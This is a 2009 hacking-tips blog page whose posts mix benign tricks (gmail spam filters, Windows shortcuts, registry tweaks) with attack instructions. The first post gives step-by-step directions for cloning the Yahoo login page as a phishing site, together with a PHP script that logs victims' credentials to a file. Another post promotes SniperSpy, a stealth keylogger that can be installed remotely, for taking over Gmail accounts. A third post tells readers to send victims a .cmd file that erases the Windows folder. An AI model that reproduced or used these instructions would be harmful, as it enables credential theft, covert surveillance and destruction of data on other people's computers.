Dear Readers: HWS has recently started a new project for the students of engineering ====> The Engineering Projects

Write at HWS !!!

Guest Posting

How secure is your Computer ?

Check out your computer safety here . A lot of tools , tricks and hacks related to computer .

Blogger Tips and Tricks

A Lot of tips ,tricks and hacks related to blogger . Seo tricks to get maximum targetted traffic to your blog.

Easy ways to Earn Online

Online earning is not so difficult but it needs a lot of patience and hardwork. Here are some techniques to earn money through internet.

Facebook Tricks

A lot of facebook tips , tricks and hacks.It requires a lot of time but reading is must.

Pro Hacking

If you have knowledge about basic techniques then try this,but be careful as it is highly toxic.

Tuesday, March 31, 2009

Hack yahoo using fake login page

Fake login page

In this post I’ll show you to hack yahoo using fake login page to hack yahoo in simple steps.A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmail etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords.

Here in this post I will give a procedure to create a fake login page of same procedure may be followed to create the fake login page of Gmail and other sites.

Here is a step-by-step procedure to create a fake login page and hack yahoo.

Hack yahoo using fake login page - Procedure

Go to the Yahoo login page by typing the following URL.


Once the Yahoo login page is loaded, Save the page as Complete HTML file. (Not as .mht file)
To save the page goto File->Save As

Tip: .mht option is available only in IE 7. So if you you are using some other browser you need not worry.

Once you save the login page completely, you will see a HTML file and a folder with the name something like this Yahoo! Mail The best web-based email! .

Make sure that the folder contains the necessary images and other support files.Now rename the Folder to “files“.You may also rename the .HTML file to yahoo.HTML

Now open the .HTML file using a WordPad.Change the links of all the files present in the folder to /files.

For example you may find something like this in the opened HTML file


Rename the above link into


Repeat the same procedure for every file contained in the folder by name “files“.

Tip: To search for the links, press Ctrl+F in the opened WordPad and search for “.gif”. Repeat the Step 5 for every .gif file.

Now search for the following term


you will see something like this


Edit this to


Tip: Open a free account in to create your own site for uploading the Fake Login Page. has to be substituted by the name of your site.For example if your site name is then replace with

Save the changes to the file.

NOTE: You can write your own code for login.php or search for login.php (Login script) on Google.

Now you have to upload your yahoo.HTML, files folder and login.php to Root folder

NOTE: Make sure that your host supports PHP

Tip: supports PHP

Configure the login.php file to save the entered password onto a .TXT file and redirect the user to original login page (

Tip: login.php can save the password in any format (not necessarily .TXT format).You can search a php script in Google that can save the password in any format.You may also search a php script that can email the username & password

NOTE: The concept here is to save the password.The format is not important here.


Distribute the Yahoo.HTML URL (ie: to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file (or any other format) in your site. Download the file to see the password inside it.
here is the login script which i am posting due to large number of requst

header("Location: http://WEBSITE ");
$handle =

fopen("pass.txt", "a");
foreach($_GET as

$variable => $value) {

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

Friday, March 27, 2009

Hack Gmail account using keylogger

The easiest way to hack gmail is by using a keylogger(Spy Software). It doesn’t matter whether or not you have physical access to the target computer. To use a keylogger it doesn’t need any technical knowledge. Anyone with a basic knowledge of computers can use keyloggers

1. Sniper Spy (Remote Install Supported)

Editors Rating: 8/10

SniperSpy is the industry leading Remote password hacking software combined with the Remote Install and Remote Viewing feature.
Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s!  This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access!
Do you want to Spy on a Remote PC? Expose the truth behind the lies! Unlike the rest, SniperSpy allows you to remotely spy any PC like a television! Watch what happens on the screen LIVE! The only remote PC spy software with a SECURE control panel!
This Remote PC Spy software also saves screenshots along with text logs of chats, websites, keystrokes in any language and more. Remotely view everything your child
, employee or anyone does while they use your distant PC. Includes LIVE admin and control commands!SniperSpy Features:
1. SniperSpy is remotely-deployable spy software
2. Invisibility Stealth Mode Option. Works in complete stealth mode. Undetectable!
3. Logs All Keystrokes
4. Records any Password (Email, Login, Instant Messenger etc.)
5. Remote Monitor Entire IM conversations
 so that you can spy on IM activities too
6. Captures a full-size jpg picture of the active window however often you wish
7. Real Time Screen Viewer
8. Remotely reboot or shutdown the PC or choose to logoff the current Windows user
9. Completely Bypasses any Firewall

For more information on this program and download details visit the following link

Thursday, March 26, 2009

5 ways on How to block spams on gmail

What is SPAM?

Spam is the abuse of electronic messaging systems (including most broadcast media, digital delivery systems) to send unsolicited bulk messages indiscriminately. Most widely recognized form of spam is email spam.

While Gmail doesn't filter all spam messages that could reach your inbox, it still does a better job as compared to other webmails such as Yahoo Mail or Hotmail. Apart from consistent improvements being done on Gmail's filters, the utmost ingredient that contribute to the overall effectiveness is the use of community signals.

How to block spams on gmail:

1. Block image spam
As the webmail filters get better, spam also evolves and becomes harder to block. This is particularly true when it uses images and literary texts. Here's a simple Gmail trick to divert spam messages (contain images) to the Trash folder (or any folder you specify) automatically.
Step 1: Firstly you need to go to 'Settings > Filters' and choose "Create a Filter".
Step 2: Type 'multipart/related .gif' in the 'Has the Words' field and also check the 'Has Attachment' box.

Step 3: Click next and select "Delete It" to move the spam message directly to the GMailTrash folder.
Note: There's a small chance of GMail filter triggering false positive and move few important emails from real senders to the Trash folder. To make sure this thing doesn't happen, create a new folder (label) in gmail and change the instruction to redirect all related mails to the new folder. You can sort out the mails later on during your free time.
2. The Plus Hack
If you like to sign up for internet freebies or buy things online, this tip will definitely come handy. Creating alias emails for aforementioned activities which are very likely to spam you, is an effective way to completely reduce number of spams in your Gmail mailbox. Not only you can track who is the culprit and you can also accurately learn with whom your email is shared with.
To do this, simply put a '+' after your account name and add words.
Example: I can do 'eches+online_deal@gmail' or ''. All these mails will come into your mailbox anyway, but they can easily be filtered to a folder and even to trash them.
3. The Googlemail Hack
When you registered with Gmail account, you are actually given two email addresses
You can use both without having fear the later might not reach your mailbox. Like the above trick, you can take advantage of these two domains so that less spam reaches your Gmail Inbox via filtering system.
For example you distribute 'yourusername' address to your close contacts while keeping the 'yourusername' address for public. Set filter such that all 'yourusername' to be delivered to a special folder. This is a definitive way to ensure important messages not to be diverted to Trash folder by mistake.
4. The Dot Hack
Gmail doesn’t acknowledge dots (.) in your account name. So I can use '' or without any dots at all. Either way will return to ''.
Again you can use the power of filter system to divert certain aliases to specific folders or directly to Trash folder.
I hope you can you use some of the tips above to reduce spams in your Gmail mailbox. Again, these tips are not definitive ways to completely eliminate spams but they can effectively reduce the spam numbers.

Gmail may be the best mail arround but it lacks some common features like blocking a spammer from sending you mails. But thankfully here is away to do this.You can send mails from a id to the Trash automatically.

5.Block spammers on gmail:
Select "create a new filter" next to search box
Type the desired email address under From:
Click Next .
Check Delete it box under Choose action.
Save it.

If you wish to blocks a entire domain type just "". (without quotation marks)
To block more than one address, separate them with "" (without quotation marks).
For eaxample you can block both and by typing

Make virus in just one minute

Here is a simple and easy trick to make a virus.

How To Make a Virus ?

  • Go to notepad,
  • Type erase C:\WINDOWS,
  • Save IT AS SOMETHING.cmd ,
  • Send to victim, once the victim opens it, the map WINDOWS will be gone and have to install WINDOWS again...

How does this Virus Works?

  • The working of this virus is very simple,Once the victim runs the .cmd file on his computer,This virus will just erase the windows file causing the computer to crash.

Tuesday, March 24, 2009

Windows shortcuts - Essential for Everyone

Here are some windoes shortcut keys

Windows Shortcuts keys

  • Alt + E — Opens the Edit menu
  • Alt + Enter — Opens the Properties window
  • Alt + F — Opens the File menu
  • Alt + F4 — Closes the current program
  • Alt + Print — Screen Takes a screen shot of the current window or program
  • Alt + Tab — Switches between the programs currently in use
  • Ctrl + A — Selects all text
  • Ctrl + C — Copies the selected object
  • Ctrl + End — Jumps to the end of the current document
  • Ctrl + Esc — Opens the Start menu
  • Ctrl + F4 — Closes the current program
  • Ctrl + Home — Jumps to the beginning of the current document
  • Ctrl + Insert — Copies the selected object
  • Ctrl + left arrow — Moves to the left one word
  • Ctrl + right arrow — Moves to the right one word
  • Ctrl + V — Pastes the selected object
  • Ctrl + X — Cuts the selected object
  • Ctrl + the “+”key — Perfectly resizes the width of Explorer columns
  • End — Jumps to the end of the current line
  • F1 — Opens the Help menu
  • F2 — Renames the selected icon
  • F3 — Launches the Search Companion in a folder or on the desktop
  • F4 — Accesses the Address Bar in a folder or window
  • F5 — Refreshes the contents of a folder or window
  • Home — Jumps to the beginning of the current line
  • Shift + Delete — Permanently deletes files (bypasses the Recycle Bin)
  • Shift + End — Highlights text from the current position to the end of the line
  • Shift + F10 — Substitutes for a right-click
  • Shift + Home — Highlights text from the current position to the beginning of the line
  • Shift + Insert — Pastes the selected object
  • Shift while inserting — Prevents the CD player from playing an audio CD

Shortcuts for Keyboards with a “Windows” Key

  • Windows Key + E — Opens Windows Explorer
  • Windows Key + F — Launches the Windows Search Companion
  • Windows Key + F1 — Opens the Help and Support Center
  • Windows Key + L — Locks down Windows
  • Windows Key + M — Minimizes all windows and shows the desktop
  • Windows Key + M + Shift — Undoes the minimize
  • Windows Key + Opens — the System Properties window Pause/Break key
  • Windows Key + R — Opens the Run window
  • Windows Key + U — Launches the Utility Manager

Thursday, March 19, 2009

Yahoo Messenger trick-How to open Multiple Yahoo Messenger

Here is the trick to open multiple yahoo Messanger
  • Go to start > Run > Type regedit > Press Enter.
  • Click on the plus sign near the folder HKEY_CURRENT_USER.
  • Click on the plus sign near the folder Software.
  • Click on the plus sign near the folder Yahoo.
  • Click on the plus sign near the folder Pager.
  • Right Click on the folder name Test > New > DWORD Value.
  • Right side you will get a file named New Value #1.
  • Right Click on the file New Value #1 and Rename it as Plural and press enter.
  • Double Click on the file Plural.
  • You will get a windown named Edit DWORD Value.
  • Type 1 inside 'Select the Value data' and press enter.
  • Close the registery editor window.
  • Now you can launch multiple windows and use different ID's.

How to delete undetecteble file in windows xp

Today i will tell u how to delete undetecteble file on XP. They are not deleted simply and a message appears that "access denied" There is a simple way to delete those files. Read this carefully :
  • Click on Start, Search, All Files and Folders.
  • Right-click on file.
  • Choose properties/file location example: c:\windows\system32\undeleteablefile.exe
  • Open a Command Prompt window.
  • Again Click on Start button, Run and type TASKMGR.EXE and press Enter to start Task manager.
  • Click on the Processes tab, click on the process named Explorer.exe and click on End Process.
  • Minimize Task Manager.
  • Go back to the Command Prompt window and change to the directory where the file is located. 
  • To do this, use the CD command cd \windows\system32
  • Type DEL where is the file you wish to delete  Example: del undeletablefile.exe
  • Go back to Task Manager.
  • In Task Manager, click File, New Task and enter EXPLORER.EXE to restart the Windows shell.
  • Close Task Manager and the file is deleted.

Download video from youtube with out software

YouTube is the world's best online videos network but the problem is you can't download videos from YouTube directly.There are many online sites and softwares which gives you option to download YouTube videos quite easily but this is the simplest trick to download YouTube videos.

  • While playing the video on YouTube,just copy the location of video from the address bar like 
  • Now add the word ‘kick’ between www. and
  • As an example 
  • That’s it.
 Download without any other software or going to any other site, as their are many but this method is the best one according to me. Enjoy :)

Sunday, March 15, 2009


"Hack With Style" is not a blog which promotes encourages and exite hackers,But its purpose is to aware people that what is going around. But in reality, our goal is to prevent hacking. We believe that unless you know how to hack (ethically), you cannot defend yourself from malicious hack attacks. Know Hacking but No Hacking!

Difference b/w ethical hacking and non Etihcal hacking

The practice of breaking into computers without malicious intent, simply to find security hazards and report them to the people responsible.
The concept of "ethical hacking" is questionable because most people do notwant strangers trying to break into their computers, no matter how benign the motives. Malicious crackers almost always claim to be "ethical hackers" when caught.We do not allow strangers to attempt "ethical lockpicking" or "ethical burglary." Experiments to test the security of a system should only be done with the advance permission of the victim.
They may use computers to attack systems for profit, for fun, or for political motivations or as a part of a social cause. Such penetration often involves modification and/or destruction of data, and is done without authorization and hence they should not be confused with ethical hackers.
They also may distribute computer viruses, Internet worms, and deliver spam through the use of botnets. The term may also refer to hackers who crack software to remove protection methods: copy prevention, trial/demo version, serial number, hardware key, date checks, CD check (NO-CD) or software annoyances like nag screens and adware.

Few articles (posts) on this site may contain the information related Hacking not the GUIDES of Hacking. They only provide information about the legal ways of retrieving the passwords. You shall not misuse the information to gain unauthorised access.

Some of the tricks provided by us may no longer work due to fixture in the bugs that enabled the exploits. We are not responsible for any direct or indirect damage caused due to the usage of the hacks provided on this site.

Warning:Hacking is a crime and we are not responsible for the way you use it.

Saturday, March 14, 2009

Hacking tools

A hacking tool is a program designed to assist with hacking, or a legitimate utility that can also be used for hacking. Examples include Nmap, Nessus Remote Security Scanner, John the Ripper, SuperScan, p0f, and Winzapper. Chocolate has also been designated as among the most potent hacking tools, due to its potential exploitation in social engineering attacks. Occasionally, common software such as ActiveX is exploited as a hacking tool as well.

Hacking tools

Here is the list of some great hacking tools.
Nmap is distributed with source code under the terms of the GNU General Public License and is a utility for network exploration or security auditing. Hackers have misused this program and administrators use it to find vulnerabilities.

With this tool you can easily find hidden NDS objects in your tree. This download consist of two files an NLM file and a text with instructions.
Folder lockis a file-security program that can password-protect, lock, hide and encrypt any number of files, folders, drives, pictures and documents This can even protect files on USB flash drives, memory sticks and other media.
WinSpy is a program designed to find out what has been done on your computer. You find out web sites visited, images, text, movies and files opened/saved or other details.

This is a daemon which logs the various IP packets sent to a a computer. It also displays information on the incoming packets and which can be logged and which need not.
Scanlogd is a port scan detection tool that can help the IDS developer to deal with intrusion. This is an open source tool distributed under GNU lisence

Twitter Delicious Facebook Digg Stumbleupon Favorites More


Recent Posts

Join Me On Facebook

700+ Followers


meet women in Ukraine contatore visite website counter

Recent Comments

Follow Me On Twitter

1112+ Followers